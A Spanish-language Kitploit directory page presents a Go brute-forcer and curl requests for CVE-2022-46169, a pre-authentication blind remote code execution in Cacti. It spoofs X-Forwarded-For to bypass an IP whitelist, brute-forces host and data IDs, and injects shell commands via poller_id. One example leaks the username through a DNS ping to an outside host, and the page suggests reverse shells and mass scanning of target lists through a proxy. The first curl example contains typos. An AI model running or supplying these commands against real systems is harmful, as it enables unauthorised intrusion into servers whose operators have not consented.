Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-46169 — CVE-2022-46169 - Cacti Ejecución remota de código ciega (Pre-Auth) | Kitploit
Herramientas/GitHubGitHub/taythebot/cve-2022-46169
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubtaythebot/cve-2022-46169

CVE-2022-46169

CVE-2022-46169 - Cacti Ejecución remota de código ciega (Pre-Auth)

Ver Repositorio
12hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-46169

Cacti Ejecución Remota de Código Ciega (Pre-Autenticación)

Descargo de responsabilidad

Esto es solo con fines educativos. No soy responsable de tus acciones. Úsalo bajo tu propio criterio.

Explicación

Este script realiza fuerza bruta en las variables necesarias para explotar esta vulnerabilidad. Este exploit requiere las siguientes 3 variables:

  • Dirección IP en lista blanca
  • Parámetro host_id correcto
  • Parámetro local_data_ids correcto

El archivo remote_agent.php está protegido por una lista blanca de IP. Puedes omitir esto falsificando tu dirección IP en el encabezado X-Forwarded-IP. La mayoría de las instancias tendrán 127.0.0.1 o la propia dirección IP del servidor en la lista blanca.

A continuación, debes hacer fuerza bruta en los parámetros de solicitud host_id y . Esto se hace enumerando pares de enteros desde un valor mínimo predeterminado de 1 y un valor máximo de 10.

local_data_ids
x,y

Ejemplo de Solicitud

root@kitploit:~
pair_x="1"
pair_y="2"
curl -k -H "X-Forwarded-For: 127.0.0.1" \
    "https://target.com/cacti/remote_agent.php?action=polldata&poller_id=1&host_id=$pari_x&=local_data_ids[]=$pair_y"

[]

Explotación

Después de haber obtenido estas 3 variables, puedes inyectar un comando de shell en la clave poller_id y escaparlo poniendo un ; antes de tu comando.

Esto es un RCE ciego, por lo que necesitas enviar la salida de tu comando a algún lugar como interact.sh o abrir una reverse shell. ¡Recuerda codificar la URL del valor poller_id!

El siguiente comando ejecuta ping $(whoami).test.com

root@kitploit:~
curl -k -H "X-Forwarded-For: 127.0.0.01" \
    "https://target.com/cacti/remote_agent.php?action=polldata&host_id=1&local_data_ids[]=3&poller_id=;ping%20%24%28whoami%29.test.com"

Salida

El script genera en formato CSV. Los encabezados son "target", "ip", "host_id", "data_id", "url".

Si el valor url falta, significa que el script pudo evitar la restricción de IP pero no logró hacer fuerza bruta en los IDs. Puedes tomar esta salida y establecer un valor máximo más alto para intentarlo de nuevo.

Procesamiento de la Salida

Puedes usar los siguientes comandos para procesar rápidamente el archivo de salida

Objetivos con restricción de IP omitida

root@kitploit:~
tail -n +2 results.csv | cut -d ',' -f1 | sort -u

Objetivos explotables

root@kitploit:~
tail -n +2 results.csv | cut -d ',' -f5 | sort -u 

Compilación

root@kitploit:~
go build -v -o bruteforce bruteforce.go

Uso

root@kitploit:~
./bruteforce -l targets.txt -t 50 -min 1 -max 10
  • Los objetivos deben ser una lista de direcciones IP, el puerto puede omitirse
  • Se admite proxy Socks5 -proxy socks5://127.0.0.1:9050
  • El archivo de salida predeterminado es results.csv
Descargar herramienta